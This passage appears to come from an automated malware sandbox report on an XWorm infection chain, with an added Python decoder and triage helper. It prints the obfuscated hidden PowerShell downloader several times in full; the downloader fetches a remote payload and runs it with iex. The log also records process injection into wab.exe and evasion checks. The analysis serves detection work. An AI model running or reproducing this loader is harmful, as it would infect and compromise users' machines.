wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Jump to behavior
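The `hdrede` function in the command lines above is the sample's string decoder: `$Plethorous` is assembled into `Substring`, `$Sulphuric = 1` is the substring length, and the `For` loop reads the character at index 5, 11, 17, ... up to `Length - 1`, so each payload character hides behind five filler characters (`$Traguloidea` decodes to `iex`, `$Gainyield` to `>`). The AMSI entries earlier in this section show the decoded second stage building a delegate with `GetDelegateForFunctionPointer` over a `(IntPtr, UInt32, UInt32, UInt32) -> IntPtr` signature, which is consistent with `VirtualAlloc` (an inference from the parameter types, not something the report states), plus `DefineDynamicAssembly`/`DefineDynamicModule` with `AssemblyBuilderAccess::Run`. The Python below is an added example, not code from the report, the sample or Joe Sandbox: it re-implements the decoder, pulls every `hdrede '...'` argument out of a script block, and flags the in-memory loading API names seen in those AMSI entries. One caveat when trying it on this page: extraction dropped the non-ASCII letters of the Danish filler words, so the longer strings here no longer decode cleanly (`$Tudkoppernes` comes out as `User-Agen ` with the stride shifted by one). The round-trip helper `wrap`, its filler words and the sample script-block line are constructed for the example.

```python
"""Static triage helpers for the hdrede-wrapped PowerShell stage.
Added example, not code from the report, the sample or Joe Sandbox."""
from __future__ import annotations

import re
from itertools import cycle

# Read off the command line in the report: $Sulphuric = 1 is the Substring
# length, the For loop starts at index 5, steps by 6 and stops at Length - 1.
START, STEP = 5, 6


def hdrede(wrapped: str) -> str:
    """Re-implementation of the sample's decoder: keep the character at
    index 5, 11, 17, ... (one payload byte behind every five filler bytes),
    never reading the final position."""
    limit = len(wrapped) - 1
    return "".join(wrapped[i] for i in range(START, limit, STEP))


# Constructed filler words (five characters each). The real sample pads with
# Danish dictionary fragments; any five characters work for the decoder.
FILLERS = ("Lorem", "ipsum", "dolor", "sitam", "etcon")


def wrap(payload: str) -> str:
    """Inverse of hdrede, constructed here so round trips can be checked."""
    words = cycle(FILLERS)
    body = "".join(next(words) + ch for ch in payload)
    # Trailing filler keeps the last payload character below the Length-1 bound.
    return body + next(words) + " "


def decode_calls(script: str, decoder: str = "hdrede") -> list[str]:
    """Decode every single-quoted argument passed to the decoder function.
    The function name is a per-sample variable, hence the parameter."""
    pattern = re.compile(re.escape(decoder) + r"\s+'([^']*)'")
    return [hdrede(arg) for arg in pattern.findall(script)]


# API names that appear in the AMSI entries above; together they are the
# classic Reflection.Emit + delegate route to calling native code from .NET.
INDICATORS = (
    "FromBase64String",
    "GetDelegateForFunctionPointer",
    "DefineDynamicAssembly",
    "DefineDynamicModule",
    "AssemblyBuilderAccess]::Run",
    "CurrentDomain.GetAssemblies",
)


def flag_dynamic_loading(text: str) -> list[str]:
    """Return the in-memory loading indicators present in a script block."""
    return [name for name in INDICATORS if name in text]


def triage(script: str, decoder: str = "hdrede") -> dict:
    """Decode the wrappers, then scan raw and decoded text for indicators."""
    decoded = decode_calls(script, decoder)
    return {
        "wrapper_calls": len(decoded),
        "decoded": decoded,
        "indicators": flag_dynamic_loading(script + " ".join(decoded)),
    }


# Two short wrapped strings copied from the command line above; they survived
# extraction intact ($Traguloidea and $Gainyield).
IEX_WRAPPED = " LeeuiPhiloeCotylxBront "
SPLIT_WRAPPED = "Pino,> orma "
# $Tudkoppernes as printed on this page: one non-ASCII filler letter was
# dropped in extraction, so the stride drifts and the decode is a byte short.
HEADER_WRAPPED = "MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca "
# Constructed script-block line shaped like the report's AMSI entries.
AMSI_LINE = (
    "GetDelegateForFunctionPointer((Paaflge $Distingu $Drikningerne), "
    "(Expositing @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
    "$global:Palaquium = [AppDomain]::CurrentDomain.GetAssemblies()"
)

if __name__ == "__main__":
    for s in (IEX_WRAPPED, SPLIT_WRAPPED, HEADER_WRAPPED):
        print(f"{s!r:70} -> {hdrede(s)!r}")
    sample = "$T=hdrede ' LeeuiPhiloeCotylxBront ';& ($T) (hdrede 'Pino,> orma ')"
    print(triage(sample))
    print(flag_dynamic_loading(AMSI_LINE))
```

Run it against a script-block log (Event ID 4104) or the command line from a process-creation event; a high `wrapper_calls` count together with any `indicators` hit is a much stronger signal than either alone, since the wrapper density is what distinguishes this family's stage from ordinary long PowerShell one-liners.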
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD3466122F pushfd ; ret 3_2_00007FFD34661232
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0443E3B0 push eax; retf 6_2_0443E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0443FE03 push esp; retf 6_2_0443FE09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07160638 push eax; mov dword ptr [esp], ecx 6_2_07160AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07160AAC push eax; mov dword ptr [esp], ecx 6_2_07160AC4
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: 2730000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: 23190000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: 25190000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6212
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3576
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7580
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2163
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 7067
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 2719
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520 | Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224 | Thread sleep count: 7580 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224 | Thread sleep count: 2163 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3180 | Thread sleep time: -23980767295822402s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4784 | Thread sleep count: 7067 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4784 | Thread sleep count: 2719 > 30
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000003.00000002.2848754401.0000024C6F8E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04438398 LdrInitializeThunk,6_2_04438398
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_5092.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5092, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5144, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 273F8B4
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=Jump to behavior
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Jump to behavior
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
               Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
               Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
               Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Program Manager
               Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
               Source: wab.exe, 0000000C.00000002.3376138960.00000000231E0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Program Managert-
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
